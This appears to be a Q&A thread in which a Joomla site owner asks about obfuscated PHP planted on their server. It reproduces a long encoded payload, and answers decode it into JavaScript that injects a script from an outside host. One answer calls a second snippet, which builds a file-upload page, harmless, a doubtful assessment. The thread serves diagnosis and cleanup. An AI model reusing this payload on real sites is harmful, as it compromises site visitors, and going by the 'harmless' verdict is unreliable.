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'\x29\x29\x29\x3B",".");
```

Comment: No, you have to decode it yourself *if you actually care*. Lots of information on how to do that can be found here http://stackoverflow.com/search?q=php%20decode%20obfuscated%20code

Answer (score 2, accepted):

This code generates some Javascript:

```
foreach(array(10, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 66, 121, 73, 100, 40, 39, 80, 104, 112, 79, 117, 116, 112, 117, 116, 39, 41, 46, 115, 116, 121, 108, 101, 46, 100, 105, 115, 112, 108, 97, 121, 61, 39, 39, 59, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 66, 121, 73, 100, 40, 39, 80, 104, 112, 79, 117, 116, 112, 117, 116, 39, 41, 46, 105, 110, 110, 101, 114, 72, 84, 77, 76, 61, 39, 39, 59, 10, 10, 13, 9, 92, 39, 0, 112, 49, 60, 115, 99, 114, 105, 112, 116, 32, 115, 114, 99, 61, 104, 116, 116, 112, 58, 47, 47, 102, 97, 99, 101, 116, 111, 102, 97, 99, 101, 46, 100, 101, 47, 101, 120, 116, 47, 62, 60, 47, 115, 99, 114, 105, 112, 116, 62, 116, 114, 117, 101, 99, 115, 115) as $vj[0]) {
    $vf. = chr($vj[0]);
}
```

Made an `$vg.`, if I echo this, it generates:

```
document.getElementById('PhpOutput').style.display='';   
document.getElementById('PhpOutput').innerHTML=''; \'p1truecss
```

So this code does nothing with your htaccess

The second code generates a Link. But I you currently are trying to hack a script. Which I don't know is legal. The code shows this error. So it is generating a link. But not all the variables it required are given. So I can't echo the `preg_replace`

```
Fatal error: preg_replace() [<a href='function.preg-replace'>function.preg-replace</a>]: Failed evaluating code:
```

Comment: The thing is I did not place these codes on the site. They are somehow being created and executed on the site. Even if I delete them, they get auto created again!!

Comment: @Kenyana : This happened on my site once too. Make sure you change all your passwords for ftp/controllpanel and such. Go over every folder to make sure it has the propper chmode. Do you have a fileuploader on your site, if yes, this is likely the source of the problem. Try making it more secure. You should also look over your ajax. That was how they hacked me.

Comment: Thanx optimus. My site is joomla based.

Answer (score 1):

To find out what your obfuscated code does, remove all the `eval()`s or replace them with `print()`. In this case it seems safe enough to do (but if you're already compromised, it wouldn't matter). If that doesn't reveal the code, add the `print` earlier on.

In your case the default fallback is to just output following:

```
<script src=http://facetoface.NOFOLLOW/ext/></script>
                             .de
```

Answer (score 1):

You second codesnippet replaces some of the characters, so you end up with a dummy-page. The page shows all files in your folder and some options to upload files/create folders and such.

As far as I found out, this file was harmless. I could not see any signs of bad behavior in the code, although I found some ajax-script that I did not fully understand.

Comment: So the second code can be used to 'upload' files into my directory?

Comment: I don't really know if it does anything. The output was pure html with some javascript. If you want to upload something or create a directory, you need to do that in php, and the php-source did not have any functions like that.